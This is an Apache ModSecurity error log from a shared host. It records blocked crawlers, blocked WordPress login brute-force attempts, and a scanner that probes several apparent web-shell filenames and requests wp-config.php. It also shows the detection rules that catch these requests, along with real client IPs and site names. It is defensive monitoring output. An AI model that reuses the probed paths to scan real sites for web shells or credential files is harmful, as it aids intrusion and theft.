[Tue May 26 19:08:29.105076 2026] [security2:error] [pid 6038:tid 6295] [client 85.208.96.197:44232] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWiVVHA3ZmGrHHEr4qvvgAAAQQ"]
[Tue May 26 19:08:30.246736 2026] [security2:error] [pid 6038:tid 6291] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiVVHA3ZmGrHHEr4qv4wAAAQA"]
[Tue May 26 19:08:30.794118 2026] [security2:error] [pid 6038:tid 6208] [client 178.20.45.182:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWiVlHA3ZmGrHHEr4qwGgAAAK0"], referer: http://www.anujtradingco.com/top-deejay-headphones/?unapproved=1080029&moderation-hash=0e87fce109a830c284db19e55e399fb4
[Tue May 26 19:08:31.267335 2026] [security2:error] [pid 6038:tid 6275] [client 178.20.45.182:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWiV1HA3ZmGrHHEr4qwMgAAAPA"], referer: http://anujtradingco.com/top-deejay-headphones/?unapproved=1080029&moderation-hash=0e87fce109a830c284db19e55e399fb4
[Tue May 26 19:08:32.548685 2026] [security2:error] [pid 6038:tid 6180] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiWFHA3ZmGrHHEr4qwZQAAAJE"]
[Tue May 26 19:08:32.764263 2026] [security2:error] [pid 6038:tid 6228] [client 152.58.60.72:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWiWFHA3ZmGrHHEr4qwiQAAAME"], referer: https://www.ucdc.co.in/
[Tue May 26 19:08:33.541909 2026] [autoindex:error] [pid 6038:tid 6216] [client 205.210.31.149:0] AH01276: Cannot serve directory /home1/moesartc/public_html/drunktales.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:08:33.700187 2026] [autoindex:error] [pid 6038:tid 6180] [client 152.58.60.72:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/?utm_source=chatgpt.com
[Tue May 26 19:08:33.832038 2026] [security2:error] [pid 6038:tid 6173] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiWVHA3ZmGrHHEr4qwrAAAAIo"]
[Tue May 26 19:08:33.899130 2026] [security2:error] [pid 6038:tid 6052] [remote 176.95.46.127:36350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.46.95.176.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWiWVHA3ZmGrHHEr4qwxAAA8Q0"]
[Tue May 26 19:08:34.418451 2026] [security2:error] [pid 6038:tid 6048] [remote 176.95.46.127:36350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.46.95.176.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWiWlHA3ZmGrHHEr4qwzgAAnwk"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:08:36.755097 2026] [security2:error] [pid 6038:tid 6250] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiXFHA3ZmGrHHEr4qxAAAAANc"]
[Tue May 26 19:08:37.111346 2026] [security2:error] [pid 6038:tid 6066] [remote 163.172.31.86:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.31.172.163.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahWiXFHA3ZmGrHHEr4qxDQAA7hs"]
[Tue May 26 19:08:37.730018 2026] [security2:error] [pid 6038:tid 6059] [remote 51.195.215.114:27216] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "soto-plumbing.com"] [uri "/robots.txt"] [unique_id "ahWiXVHA3ZmGrHHEr4qxIAAA5BQ"]
[Tue May 26 19:08:37.730212 2026] [security2:error] [pid 6038:tid 6263] [client 51.195.215.114:27216] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "soto-plumbing.com"] [uri "/robots.txt"] [unique_id "ahWiXVHA3ZmGrHHEr4qxIAAA5BQ"]
[Tue May 26 19:08:37.899706 2026] [security2:error] [pid 6038:tid 6047] [remote 163.172.31.86:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.31.172.163.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahWiXVHA3ZmGrHHEr4qxJAAApQg"], referer: https://kingsclub.in/wp-login.php
[Tue May 26 19:08:38.743984 2026] [security2:error] [pid 6038:tid 6060] [remote 113.190.40.93:55344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 93.40.190.113.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWiXlHA3ZmGrHHEr4qxOgAA8xU"]
[Tue May 26 19:08:38.807824 2026] [security2:error] [pid 6038:tid 6228] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiXlHA3ZmGrHHEr4qxNgAAAME"]
[Tue May 26 19:08:39.265788 2026] [security2:error] [pid 6038:tid 6064] [remote 142.44.228.132:26608] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "soto-plumbing.com"] [uri "/"] [unique_id "ahWiX1HA3ZmGrHHEr4qxSQAAmBk"]
[Tue May 26 19:08:39.266059 2026] [security2:error] [pid 6038:tid 6187] [client 142.44.228.132:26608] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "soto-plumbing.com"] [uri "/"] [unique_id "ahWiX1HA3ZmGrHHEr4qxSQAAmBk"]
[Tue May 26 19:08:40.077054 2026] [security2:error] [pid 6038:tid 6065] [remote 113.190.40.93:55344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 93.40.190.113.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWiYFHA3ZmGrHHEr4qxXwAA4xo"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:08:41.162476 2026] [security2:error] [pid 6038:tid 6228] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiYFHA3ZmGrHHEr4qxcgAAAME"]
[Tue May 26 19:08:41.466065 2026] [security2:error] [pid 6038:tid 6267] [client 66.146.235.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWiYVHA3ZmGrHHEr4qxiQAAAOg"], referer: https://www.anujtradingco.com/
[Tue May 26 19:08:41.851374 2026] [security2:error] [pid 6038:tid 6085] [remote 222.165.190.235:38030] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWiYVHA3ZmGrHHEr4qxkQAAuS4"]
[Tue May 26 19:08:42.382517 2026] [security2:error] [pid 6038:tid 6094] [remote 222.165.190.235:38030] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWiYlHA3ZmGrHHEr4qxngAAvjc"], referer: https://bosscoirs.com/wp-login.php
[Tue May 26 19:08:42.782907 2026] [security2:error] [pid 6038:tid 6179] [client 66.146.235.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWiYlHA3ZmGrHHEr4qxsQAAAJA"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1230522&moderation-hash=3045c8d525c2db48bd4eb670ab172339
[Tue May 26 19:08:43.361992 2026] [security2:error] [pid 6038:tid 6220] [client 20.151.214.118:22742] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.214.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.rsmsi.org.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWiY1HA3ZmGrHHEr4qxxAAAALk"]
[Tue May 26 19:08:43.362182 2026] [security2:error] [pid 6038:tid 6220] [client 20.151.214.118:22742] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.rsmsi.org.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWiY1HA3ZmGrHHEr4qxxAAAALk"]
[Tue May 26 19:08:43.510786 2026] [security2:error] [pid 6038:tid 6294] [client 20.151.214.118:29478] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.214.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.rsmsi.org.in"] [uri "/166.php"] [unique_id "ahWiY1HA3ZmGrHHEr4qxywAAAQM"]
[Tue May 26 19:08:43.510924 2026] [security2:error] [pid 6038:tid 6294] [client 20.151.214.118:29478] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.rsmsi.org.in"] [uri "/166.php"] [unique_id "ahWiY1HA3ZmGrHHEr4qxywAAAQM"]
[Tue May 26 19:08:43.670827 2026] [security2:error] [pid 6038:tid 6197] [client 20.151.214.118:23536] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.214.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.rsmsi.org.in"] [uri "/ups.php"] [unique_id "ahWiY1HA3ZmGrHHEr4qx2AAAAKI"]
[Tue May 26 19:08:43.670962 2026] [security2:error] [pid 6038:tid 6197] [client 20.151.214.118:23536] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.rsmsi.org.in"] [uri "/ups.php"] [unique_id "ahWiY1HA3ZmGrHHEr4qx2AAAAKI"]
[Tue May 26 19:08:43.825748 2026] [security2:error] [pid 6038:tid 6195] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiY1HA3ZmGrHHEr4qxyAAAAKA"]
[Tue May 26 19:08:43.852163 2026] [security2:error] [pid 6038:tid 6192] [client 20.151.214.118:25546] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.214.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.rsmsi.org.in"] [uri "/file5.php"] [unique_id "ahWiY1HA3ZmGrHHEr4qx4wAAAJ0"]
[Tue May 26 19:08:43.852291 2026] [security2:error] [pid 6038:tid 6192] [client 20.151.214.118:25546] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.rsmsi.org.in"] [uri "/file5.php"] [unique_id "ahWiY1HA3ZmGrHHEr4qx4wAAAJ0"]
[Tue May 26 19:08:43.859897 2026] [autoindex:error] [pid 6038:tid 6285] [client 103.86.16.81:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/
[Tue May 26 19:08:43.997808 2026] [security2:error] [pid 6038:tid 6224] [client 20.151.214.118:22761] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.214.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.rsmsi.org.in"] [uri "/file.php"] [unique_id "ahWiY1HA3ZmGrHHEr4qx5wAAAL0"]
[Tue May 26 19:08:43.997930 2026] [security2:error] [pid 6038:tid 6224] [client 20.151.214.118:22761] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.rsmsi.org.in"] [uri "/file.php"] [unique_id "ahWiY1HA3ZmGrHHEr4qx5wAAAL0"]
[Tue May 26 19:08:44.124568 2026] [security2:error] [pid 6038:tid 6290] [client 103.86.16.81:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWiZFHA3ZmGrHHEr4qx7wAAAP8"], referer: https://www.ucdc.co.in/
[Tue May 26 19:08:44.185005 2026] [security2:error] [pid 6038:tid 6198] [client 20.151.214.118:25546] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.214.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.rsmsi.org.in"] [uri "/wp_filemanager.php"] [unique_id "ahWiZFHA3ZmGrHHEr4qx9AAAAKM"]
[Tue May 26 19:08:44.185195 2026] [security2:error] [pid 6038:tid 6198] [client 20.151.214.118:25546] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.rsmsi.org.in"] [uri "/wp_filemanager.php"] [unique_id "ahWiZFHA3ZmGrHHEr4qx9AAAAKM"]
[Tue May 26 19:08:44.333554 2026] [security2:error] [pid 6038:tid 6174] [client 20.151.214.118:22726] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.214.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.rsmsi.org.in"] [uri "/file18.php"] [unique_id "ahWiZFHA3ZmGrHHEr4qx9gAAAIs"]
[Tue May 26 19:08:44.333692 2026] [security2:error] [pid 6038:tid 6174] [client 20.151.214.118:22726] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.rsmsi.org.in"] [uri "/file18.php"] [unique_id "ahWiZFHA3ZmGrHHEr4qx9gAAAIs"]
[Tue May 26 19:08:44.488559 2026] [security2:error] [pid 6038:tid 6281] [client 20.151.214.118:11007] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.214.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.rsmsi.org.in"] [uri "/hplfuns.php"] [unique_id "ahWiZFHA3ZmGrHHEr4qx_QAAAPY"]
[Tue May 26 19:08:44.488743 2026] [security2:error] [pid 6038:tid 6281] [client 20.151.214.118:11007] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.rsmsi.org.in"] [uri "/hplfuns.php"] [unique_id "ahWiZFHA3ZmGrHHEr4qx_QAAAPY"]
[Tue May 26 19:08:44.648048 2026] [security2:error] [pid 6038:tid 6286] [client 20.151.214.118:23513] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "mail.rsmsi.org.in"] [uri "/wp-config.php"] [unique_id "ahWiZFHA3ZmGrHHEr4qx_gAAAPs"]
[Tue May 26 19:08:44.648184 2026] [security2:error] [pid 6038:tid 6286] [client 20.151.214.118:23513] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "406"] [hostname "mail.rsmsi.org.in"] [uri "/wp-config.php"] [unique_id "ahWiZFHA3ZmGrHHEr4qx_gAAAPs"]
[Tue May 26 19:08:44.868310 2026] [security2:error] [pid 6038:tid 6203] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiZFHA3ZmGrHHEr4qx_AAAAKg"]
[Tue May 26 19:08:45.426247 2026] [security2:error] [pid 6038:tid 6276] [client 185.191.171.13:38534] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.kardashevtechnologies.com"] [uri "/robots.txt"] [unique_id "ahWiZVHA3ZmGrHHEr4qyEQAAAPE"]
[Tue May 26 19:08:45.426371 2026] [security2:error] [pid 6038:tid 6276] [client 185.191.171.13:38534] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.kardashevtechnologies.com"] [uri "/robots.txt"] [unique_id "ahWiZVHA3ZmGrHHEr4qyEQAAAPE"]
[Tue May 26 19:08:45.738587 2026] [security2:error] [pid 6038:tid 6180] [client 85.208.96.207:51602] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.kardashevtechnologies.com"] [uri "/copy-of-home-3"] [unique_id "ahWiZVHA3ZmGrHHEr4qyGwAAAJE"]
[Tue May 26 19:08:45.738748 2026] [security2:error] [pid 6038:tid 6180] [client 85.208.96.207:51602] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.kardashevtechnologies.com"] [uri "/copy-of-home-3"] [unique_id "ahWiZVHA3ZmGrHHEr4qyGwAAAJE"]
[Tue May 26 19:08:46.273228 2026] [security2:error] [pid 6038:tid 6188] [client 64.233.173.102:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWiZlHA3ZmGrHHEr4qyJwAAAJk"]
[Tue May 26 19:08:47.453264 2026] [security2:error] [pid 6038:tid 6247] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiZ1HA3ZmGrHHEr4qyTgAAANQ"]
[Tue May 26 19:08:47.889461 2026] [security2:error] [pid 6038:tid 6121] [remote 162.241.152.21:60292] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.152.241.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWiZ1HA3ZmGrHHEr4qyYgAA5lI"]
[Tue May 26 19:08:49.299912 2026] [security2:error] [pid 6038:tid 6122] [remote 162.241.152.21:60292] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.152.241.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWiaVHA3ZmGrHHEr4qyjgAAylM"], referer: https://rohiniventures.com/wp-login.php
[Tue May 26 19:08:49.654251 2026] [security2:error] [pid 6038:tid 6247] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiaVHA3ZmGrHHEr4qyjQAAANQ"]
[Tue May 26 19:08:50.381823 2026] [security2:error] [pid 6038:tid 6194] [client 123.21.114.254:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiaVHA3ZmGrHHEr4qypQAAAJ8"]
[Tue May 26 19:08:51.855275 2026] [security2:error] [pid 6038:tid 6269] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWia1HA3ZmGrHHEr4qyzQAAAOo"]
[Tue May 26 19:08:52.208642 2026] [security2:error] [pid 6038:tid 6268] [client 77.75.78.161:2215] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/the-story-of-baby-sitting-has-just-gone-viral/"] [unique_id "ahWibFHA3ZmGrHHEr4qy4AAAAOk"]
